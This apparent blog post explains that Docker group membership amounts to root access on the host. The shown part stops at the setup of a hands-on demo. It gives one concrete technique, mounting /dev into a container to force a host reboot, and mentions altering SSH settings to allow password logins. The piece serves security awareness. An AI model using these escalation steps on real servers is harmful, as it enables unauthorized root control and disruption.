Why a blog about hacking with docker

Many companies allow their customers to see / manage the docker containers by allowing them to be in the docker group. After all, tts very easy to say "Just hop on to the php container to do your work".

 

Due to the way docker works, the docker engine needs escalated privileges to manage its containers and that means, anyone in the docker group, effectively has root access to the server.

Your customer might not know this, but malicious users, who can beg, steal and borrow your customers ssh credentials, most definitely will.

In our example, we've given our user sudo rights, but effectively you can achieve everything, including spionage.
As an actual recent case, i had to modify SSH information to allow PasswordAuthentication and to force the server to reboot.

To force the host to reboot from a container, you can add: -v /dev:/dev:rw to the docker run command.
From there on, if you type reboot inside the container, it will use the server socket instead of the container socket and reboot itself.
 

Lets get our hands dirty with an useful example


1. It begins with a basic setup

In this example, i created a fresh Ubuntu 20.04 Server on Digital Ocean and proceded with the installation of Docker. I added a user called "hacker" and added it to the docker group.

From there on, i could SSH to the docker server as expected.


Fresh Digital Ocean Ubuntu